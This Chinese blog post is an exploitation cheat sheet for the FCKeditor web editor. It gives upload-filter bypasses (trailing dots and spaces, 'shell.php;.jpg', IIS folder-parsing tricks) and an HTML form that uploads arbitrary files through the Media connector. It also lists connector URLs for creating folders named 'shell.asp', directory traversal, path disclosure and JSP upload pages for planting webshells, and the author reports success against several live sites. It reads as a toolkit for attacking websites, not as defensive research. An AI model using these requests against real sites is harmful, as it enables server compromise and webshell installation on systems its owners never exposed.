• Fckeditor漏洞利用总结


    查看编辑器版本
    FCKeditor/_whatsnew.html
    ———————————————————————————————————————————————————————

    ——————

    2. Version 2.2 版本
    Apache+linux 环境下在上传文件后面加个.突破!测试通过。
    ———————————————————————————————————————————————————————

    ——————

    3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将

    以下保存为html文件,修改action地址。
    <form id="frmUpload" enctype="multipart/form-data"
    action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media"

    method="post">Upload a new file:<br>
    <input type="file" name="NewFile" size="50"><br>
    <input id="btnUpload" type="submit" value="Upload">
    </form>
    ———————————————————————————————————————————————————————

    ——————

    4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
            很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
        4.1:提交shell.php+空格绕过
    不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
        4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录

    就不受限制。
    ———————————————————————————————————————————————————————

    ——————

    5. 突破建立文件夹
    FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=

    %2Fshell.asp&NewFolderName=z&uuid=1244789975684
    FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?

    Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
    ———————————————————————————————————————————————————————

    ——————

    6. FCKeditor 中test 文件的上传地址
    FCKeditor/editor/filemanager/browser/default/connectors/test.html
    FCKeditor/editor/filemanager/upload/test.html
    FCKeditor/editor/filemanager/connectors/test.html
    FCKeditor/editor/filemanager/connectors/uploadtest.html
    ———————————————————————————————————————————————————————

    ——————

    7.常用上传地址
    FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?

    Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
    FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
    FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com

    %2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
    JSP 版:
    FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
    注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
    件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。
    ———————————————————————————————————————————————————————

    ——————

    8.其他上传地址
    FCKeditor/_samples/default.html
    FCKeditor/_samples/asp/sample01.asp
    FCKeditor/_samples/asp/sample02.asp
    FCKeditor/_samples/asp/sample03.asp
    FCKeditor/_samples/asp/sample04.asp
    一般很多站点都已删除_samples 目录,可以试试。
    FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
    ———————————————————————————————————————————————————————

    ——————

    9.列目录漏洞也可助找上传地址
    Version 2.4.1 测试通过
    修改CurrentFolder 参数使用 ../../来进入不同的目录
    /browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..

    %2F&NewFolderName=shell.asp
    根据返回的XML 信息可以查看网站所有的目录。
    FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?

    Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
    也可以直接浏览盘符:
    JSP 版本:
    FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?

    Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
    ———————————————————————————————————————————————————————

    ——————

    10.爆路径漏洞
    FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?

    Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
    ———————————————————————————————————————————————————————

    ——————

    11. FCKeditor 被动限制策略所导致的过滤不严问题
            影响版本: FCKeditor x.x <= FCKeditor v2.4.3
    脆弱描述:
    FCKeditor v2.4.3 中File 类别默认拒绝上传类型:
    html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|

    htaccess|asis|sh|shtml|shtm|phtm
    Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的

    $sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[

    未测试]!
            而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用

    File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。
            在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过

    ,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!
    ———————————————————————————————————————————————————————

    ——————

    12.最古老的漏洞,Type文件没有限制!
            我接触到的第一个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx 的类型没有检查。我们可以直

    接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹,一个新类型,没有任何限制,可以上传任

    意脚本!
    ———————————————————————————————————————————————————————

    ——————

    ==============================================================================================================

    =================================

    FCK编辑器jsp版本漏洞:


    http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?

    Command=FileUpload&Type=Image&CurrentFolder=%2F

    上传马所在目录
    FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?

    Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
    上传shell的地址:
    http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?

    Type=Image&Connector=connectors/jsp/connector
    跟版本有关系.并不是百分百成功. 测试成功几个站.
    不能通杀.很遗憾.
    http://www.****.com/FCKeditor/editor/filemanager/browser/default/browser.html?

    type=File&connector=connectors/jsp/connector
    如果以上地址不行可以试试
    FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/servlet/Connector
    FCKeditor/_samples/
    FCKeditor/_samples/default.html
    FCKeditor/editor/fckeditor.htm
    FCKeditor/editor/fckdialog.html

  • 相关阅读:
    Python: 通过 pip 安装第三方包后依然不能 import
    jar命令
    vim中删除^M
    Linux 非互联网环境安装依赖包
    安装rpm包时提示错误:依赖检测失败的解决方法
    python3.5安装
    yum配置安装 及报错
    统计数组元素出现的次数
    插入法排序
    选择法排序
  • 原文地址:https://www.cnblogs.com/milantgh/p/3775396.html
Copyright © 2020-2023  润新知